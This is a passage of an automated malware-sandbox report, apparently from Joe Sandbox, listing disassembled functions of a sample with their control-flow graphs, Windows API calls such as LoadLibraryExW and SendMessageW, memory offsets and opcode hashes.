                                                                                                      • Instruction Fuzzy Hash: D94122B1C00619CFDB24DFA9C884BDDBBF5BF49304F24819AD408AB261DB756986CF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 06250BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1255 6250bfc-62542ec 1258 62542f2-62542f7 1255->1258 1259 625439c-62543bc call 6250ad4 1255->1259 1261 62542f9-6254330 1258->1261 1262 625434a-6254382 CallWindowProcW 1258->1262 1266 62543bf-62543cc 1259->1266 1268 6254332-6254338 1261->1268 1269 6254339-6254348 1261->1269 1264 6254384-625438a 1262->1264 1265 625438b-625439a 1262->1265 1264->1265 1265->1266 1268->1269 1269->1266
                                                                                                      APIs
                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 06254371
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallProcWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2714655100-0
                                                                                                      • Opcode ID: 29a783ce93a987336884891737a738f3971dd1e66f74302c794d7995532c31b0
                                                                                                      • Instruction ID: 0a1089a89a39b6ec67e368ba1809ea0d2ddae3c8a1004856a9e4d3d644bf96e3
                                                                                                      • Opcode Fuzzy Hash: 29a783ce93a987336884891737a738f3971dd1e66f74302c794d7995532c31b0
                                                                                                      • Instruction Fuzzy Hash: 034138B4910305DFDB54DF99C488AAAFBF5FB88314F25C459E919AB320D774A881CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 02B84524 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1272 2b84524-2b85df1 CreateActCtxA 1275 2b85dfa-2b85e54 1272->1275 1276 2b85df3-2b85df9 1272->1276 1283 2b85e63-2b85e67 1275->1283 1284 2b85e56-2b85e59 1275->1284 1276->1275 1285 2b85e78 1283->1285 1286 2b85e69-2b85e75 1283->1286 1284->1283 1288 2b85e79 1285->1288 1286->1285 1288->1288
                                                                                                      APIs
                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 02B85DE1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: 0bd7ae3b491b4140b98dbf29fbf3983a04eba421e203019a3fd670dd6272bcd8
                                                                                                      • Instruction ID: 1a361efe1fcd0f1fd3333354b1a62325bf99a9f235d585f8a0d0113b92046d27
                                                                                                      • Opcode Fuzzy Hash: 0bd7ae3b491b4140b98dbf29fbf3983a04eba421e203019a3fd670dd6272bcd8
                                                                                                      • Instruction Fuzzy Hash: 7041E2B1C00619CBDB24DFA9C984BDDBBF5BF48304F6480AAD408AB255DB756945CF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0625B510 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1289 625b510-625b522 1290 625b52a-625b535 1289->1290 1291 625b525 call 625a174 1289->1291 1292 625b537-625b547 call 625afd0 1290->1292 1293 625b54a-625b5dc CreateIconFromResourceEx 1290->1293 1291->1290 1297 625b5e5-625b602 1293->1297 1298 625b5de-625b5e4 1293->1298 1298->1297
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFromIconResource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3668623891-0
                                                                                                      • Opcode ID: f646623115d4cf7188958ce0606bb51eaa8dabd101da0ccc1d446b5b407296cb
                                                                                                      • Instruction ID: 8a7635f1eb07ed3a75d1af543fe6dadda799be2e3d288982a523bbabe0708793
                                                                                                      • Opcode Fuzzy Hash: f646623115d4cf7188958ce0606bb51eaa8dabd101da0ccc1d446b5b407296cb
                                                                                                      • Instruction Fuzzy Hash: 533187729003599FCB12CFA9D941AEEBFF8EF09350F14805AE954AB221C335E954DFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 02B8ABF0 Relevance: 1.6, APIs: 1, Instructions: 83libraryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1301 2b8abf0-2b8abf8 1303 2b8abfa-2b8ac0f 1301->1303 1304 2b8ac24-2b8ac58 1301->1304 1305 2b8b648-2b8b688 1303->1305 1304->1305 1307 2b8b68a-2b8b68d 1305->1307 1308 2b8b690-2b8b6bf LoadLibraryExW 1305->1308 1307->1308 1309 2b8b6c8-2b8b6e5 1308->1309 1310 2b8b6c1-2b8b6c7 1308->1310 1310->1309
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02B8B4A1,00000800,00000000,00000000), ref: 02B8B6B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: e1c379cce6545c640da964c382d22a3da3ae9cdef37bcb451cacbd8db4d39c13
                                                                                                      • Instruction ID: 24b784b5b5e4f56bba4509e4ab1c2a9c9fd463a0ad31ad8dfcfa45b18281d35f
                                                                                                      • Opcode Fuzzy Hash: e1c379cce6545c640da964c382d22a3da3ae9cdef37bcb451cacbd8db4d39c13
                                                                                                      • Instruction Fuzzy Hash: 7431BCB28053898FCB10DFA9C994BCAFFF0EF55214F0580AAC498AB351C3749545CBA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0625C3E2 Relevance: 1.6, APIs: 1, Instructions: 70windowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1313 625c3e2-625c3e9 1314 625c40f-625c42d 1313->1314 1315 625c3eb-625c3ec 1313->1315 1318 625c457-625c45d 1314->1318 1319 625c42f-625c447 1314->1319 1316 625c3ee-625c40d call 6254590 call 62523a0 1315->1316 1317 625c388-625c393 1315->1317 1320 625c395-625c398 1317->1320 1321 625c39d-625c3ba SendMessageW 1317->1321 1319->1318 1327 625c449-625c456 1319->1327 1320->1321 1323 625c3c3-625c3d7 1321->1323 1324 625c3bc-625c3c2 1321->1324 1324->1323
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,0000020A,?,?,?,?,?,?,0625410A,?,00000000,?), ref: 0625C3AD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 128cc96db0b5dad847cc3ea52e5cf20cfe092ef2051dc6ba8831276c04846f7e
                                                                                                      • Instruction ID: 43636c77bc65c137177f5cd0b4ca8db59cc5f128092141588c87515be8b849a5
                                                                                                      • Opcode Fuzzy Hash: 128cc96db0b5dad847cc3ea52e5cf20cfe092ef2051dc6ba8831276c04846f7e
                                                                                                      • Instruction Fuzzy Hash: E7216D72E253845ED771576898047EBBFE48F56314F09809EDC886B283D6784885C7E1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 06EF2890 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1331 6ef2890-6ef28da 1333 6ef28dc-6ef28e4 1331->1333 1334 6ef28e6-6ef2916 EnumThreadWindows 1331->1334 1333->1334 1335 6ef291f-6ef294c 1334->1335 1336 6ef2918-6ef291e 1334->1336 1336->1335
                                                                                                      APIs
                                                                                                      • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,06EF2878,03D2411C,02D788B0), ref: 06EF2909
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1820252857.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6ef0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumThreadWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2941952884-0
                                                                                                      • Opcode ID: 6723698fe244a11f50090a7f14133d1885d45227e7d5e98ee500966c880ac6da
                                                                                                      • Instruction ID: 8cdfa722e9594d9aadca3e307bb62d0bf9a09e857db02c54f846872609cdaaed
                                                                                                      • Opcode Fuzzy Hash: 6723698fe244a11f50090a7f14133d1885d45227e7d5e98ee500966c880ac6da
                                                                                                      • Instruction Fuzzy Hash: B1218BB1D002099FDB10CFAAC844BEEFBF8FB88320F00842AD554A3250D774A945CFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 02B8CD30 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B8D666,?,?,?,?,?), ref: 02B8D727
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 870c8fc767205fec5469b10d6dea55eaeb7815e3c05548ab811cc13c54402db2
                                                                                                      • Instruction ID: bb3c103fb3efa819f5c8ef08ef92d8dc7a9a094b36e0952e15d1a7dd58cc559a
                                                                                                      • Opcode Fuzzy Hash: 870c8fc767205fec5469b10d6dea55eaeb7815e3c05548ab811cc13c54402db2
                                                                                                      • Instruction Fuzzy Hash: 472114B5900249EFDB10DFAAD584ADEFBF4EB48310F14845AE958A7350D374A940CFA4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 02B8D699 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B8D666,?,?,?,?,?), ref: 02B8D727
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 0407d5e3e255b21da72275efe5f0d1c6b12475a65d1fb1cf10eb86c4ab8b7bba
                                                                                                      • Instruction ID: 0d5d79d29b7bb27d0e9ce8254918a59a9b47414097b8dd552696393d7eda9ee4
                                                                                                      • Opcode Fuzzy Hash: 0407d5e3e255b21da72275efe5f0d1c6b12475a65d1fb1cf10eb86c4ab8b7bba
                                                                                                      • Instruction Fuzzy Hash: 9F21E0B5901259EFDB10CFAAD584AEEBBF4EB48320F14845AE958A7350C374A940CFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 06EF1754 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,06EF2878,03D2411C,02D788B0), ref: 06EF2909
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1820252857.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6ef0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumThreadWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2941952884-0
                                                                                                      • Opcode ID: bab5243da35ef43bd0ce21abe5b426c8b408c9f97b79af30d4db145a73238370
                                                                                                      • Instruction ID: bee34b88732325d3a7aa6599ad8368d522356cae8b01dfc32b8fd830fde303d1
                                                                                                      • Opcode Fuzzy Hash: bab5243da35ef43bd0ce21abe5b426c8b408c9f97b79af30d4db145a73238370
                                                                                                      • Instruction Fuzzy Hash: 9E2147B1D003198FDB14DF9AC844BEEFBF4EB88320F10842AD558A7250D778AA45CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0625C2F2 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,0000020A,?,?,?,?,?,?,0625410A,?,00000000,?), ref: 0625C3AD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 9f0c11b5865861ae51721ef83b1c62673713fc4215da24ce01ed43f8117a9040
                                                                                                      • Instruction ID: 5ed97054136b09903e29ae34aa9e9fccd6416bfd590e5b8c08671b9b26c29e12
                                                                                                      • Opcode Fuzzy Hash: 9f0c11b5865861ae51721ef83b1c62673713fc4215da24ce01ed43f8117a9040
                                                                                                      • Instruction Fuzzy Hash: 6C1179B6914309DFDB60CF99C844BDEBBF4AF48310F15445ED884E7251D3789644CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0625A174 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0625B52A,?,?,?,?,?), ref: 0625B5CF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFromIconResource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3668623891-0
                                                                                                      • Opcode ID: 19bd184d6fb6a66a53d7e25af7e92f870e9984256a7625d52a8093b0d96ad937
                                                                                                      • Instruction ID: 2904a63fb996809194c772cdf639de1a1d1ea36ce6ff9135c23e3f60a0acd070
                                                                                                      • Opcode Fuzzy Hash: 19bd184d6fb6a66a53d7e25af7e92f870e9984256a7625d52a8093b0d96ad937
                                                                                                      • Instruction Fuzzy Hash: 7B113AB590025DDFDB20DF9AD844BDEBFF8EB48310F14841AE954A7210C375A950CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 02B8AC08 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02B8B4A1,00000800,00000000,00000000), ref: 02B8B6B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: f829f20e4859991fdfb726801cc9399ce6f9514cfd477c100061944045da5b4c
                                                                                                      • Instruction ID: 7d50764fd9dcce33878b17482700844ec92b79cacd8d3c835e498bb0eaa7f8f7
                                                                                                      • Opcode Fuzzy Hash: f829f20e4859991fdfb726801cc9399ce6f9514cfd477c100061944045da5b4c
                                                                                                      • Instruction Fuzzy Hash: 401126B69003499FDB10DFAAC444ADEFBF4EB48314F10846AD559A7210C375A945CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 02B8B643 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02B8B4A1,00000800,00000000,00000000), ref: 02B8B6B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: f9a7dac6005733c8e7e79ceca533b06d3528de6d6e80de010f3e1fc53eaa3534
                                                                                                      • Instruction ID: a1ca828140cc4622dc5c049cf2e8a48e700eef5343ac118f261344b6fdc12b83
                                                                                                      • Opcode Fuzzy Hash: f9a7dac6005733c8e7e79ceca533b06d3528de6d6e80de010f3e1fc53eaa3534
                                                                                                      • Instruction Fuzzy Hash: 921123B6D002498FDB14DFAAC444ADEFBF4EF88314F14846AD859A7210C375A545CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 067E5380 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 067E53E5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 410705778-0
                                                                                                      • Opcode ID: b46d6b0b60507233c20d61db1d3a20f34d260d307d5ab82222293e2967169cf6
                                                                                                      • Instruction ID: 8e63bf3b48a594d13c54a0c20b4e787f45da6f3f65fc9bc508b6e59a76e53755
                                                                                                      • Opcode Fuzzy Hash: b46d6b0b60507233c20d61db1d3a20f34d260d307d5ab82222293e2967169cf6
                                                                                                      • Instruction Fuzzy Hash: 2E113AB5800349DFDB10CF9AC845BEEFBF8EB48324F10841AE554A3240C375A944CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 067E4AA0 Relevance: 1.6, APIs: 1, Instructions: 50threadwindowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 067E4B08
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 1836367815-0
                                                                                                      • Opcode ID: 84c8d37d1cddcbde1c94fc86c230b2a7c26187dd73ab9d34ad01635bcfd982e9
                                                                                                      • Instruction ID: c1eefceacc38945e926ca02ed6d73870341f8287a3f119b045296498a303105c
                                                                                                      • Opcode Fuzzy Hash: 84c8d37d1cddcbde1c94fc86c230b2a7c26187dd73ab9d34ad01635bcfd982e9
                                                                                                      • Instruction Fuzzy Hash: 1B111FB58043889FDB10CF99C94ABDEBFF4AB09324F14845AD564A7281C375AA84CFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 06EF3358 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06EF33BD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1820252857.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6ef0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 410705778-0
                                                                                                      • Opcode ID: 90b00c25eb0fc3164b852c5d345cf2a6856536aaca3f778f421dc4f5ba2505d5
                                                                                                      • Instruction ID: 28fe014bfe4c4f887c1f5d6a7728abb39c1d602ba039403a7b00afc30a190537
                                                                                                      • Opcode Fuzzy Hash: 90b00c25eb0fc3164b852c5d345cf2a6856536aaca3f778f421dc4f5ba2505d5
                                                                                                      • Instruction Fuzzy Hash: C311F2B59003489FDB10DF9AD889BDEBFF8EB48320F10841AE558A7210C375A984CFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 067E5388 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 067E53E5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 410705778-0
                                                                                                      • Opcode ID: e8deaf1e762d894ab1a67d74f1bccb218021af37d95eeafef098e6d06963c37b
                                                                                                      • Instruction ID: c48305a342ec3f1a56a32763e4a6a034d03e387c709e1ee0fa90c4d9a136eca9
                                                                                                      • Opcode Fuzzy Hash: e8deaf1e762d894ab1a67d74f1bccb218021af37d95eeafef098e6d06963c37b
                                                                                                      • Instruction Fuzzy Hash: A41118B5800349DFDB10CF9AC885BEEFBF8EB48324F10841AE554A3250D379A984CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 02B8B3C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 02B8B426
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: b1ed30f94ad899c8a2f983abcbf722ea3cfc03ac6003f9837a2e45d7d2a8fe3d
                                                                                                      • Instruction ID: ed0c7f5c2688151fad98b0e5bd96123d8fa4e157fbc8dd995c1887308f91ae2a
                                                                                                      • Opcode Fuzzy Hash: b1ed30f94ad899c8a2f983abcbf722ea3cfc03ac6003f9837a2e45d7d2a8fe3d
                                                                                                      • Instruction Fuzzy Hash: F3110FB6C002498FDB10DFAAD444ADEFBF4EB88324F18846AD858A7211C375A545CFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 06253444 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,0000020A,?,?,?,?,?,?,0625410A,?,00000000,?), ref: 0625C3AD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: c10e9f1d29c62cc43c2c1c1998eb4c697d42b186c7797347449fa0a90e05e1d4
                                                                                                      • Instruction ID: bba25322d1ffdde396f0086b031aa4f07a930e79b587381bd7e94002b6c774fb
                                                                                                      • Opcode Fuzzy Hash: c10e9f1d29c62cc43c2c1c1998eb4c697d42b186c7797347449fa0a90e05e1d4
                                                                                                      • Instruction Fuzzy Hash: 6F1136B5900348DFDB20DF8AC884BDEBBF8EB48310F108419E958A7200D375A944CFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0625A1B8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0625B92D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 440c6d1849f2b767b6b71c2416d8d51ece7bb7249555a623ff0ddaf48d340f2a
                                                                                                      • Instruction ID: b6546a65496a9c7a8a8239c3fe853d1ecae016fd04e25743b2899fd31a583c21
                                                                                                      • Opcode Fuzzy Hash: 440c6d1849f2b767b6b71c2416d8d51ece7bb7249555a623ff0ddaf48d340f2a
                                                                                                      • Instruction Fuzzy Hash: 771106B5810349DFDB20DF9AD585BDEFBF8EB48320F10845AE954A7200C375A944CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0625B8C8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0625B92D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 6fe10995d3de54d35dd4c572ddbf0904480502c866ee97204037d40e5f43b2f6
                                                                                                      • Instruction ID: 93df7f1107f536b3a47036b71e4e5ad0fc4a9a2d812073eb345442d4452f573d
                                                                                                      • Opcode Fuzzy Hash: 6fe10995d3de54d35dd4c572ddbf0904480502c866ee97204037d40e5f43b2f6
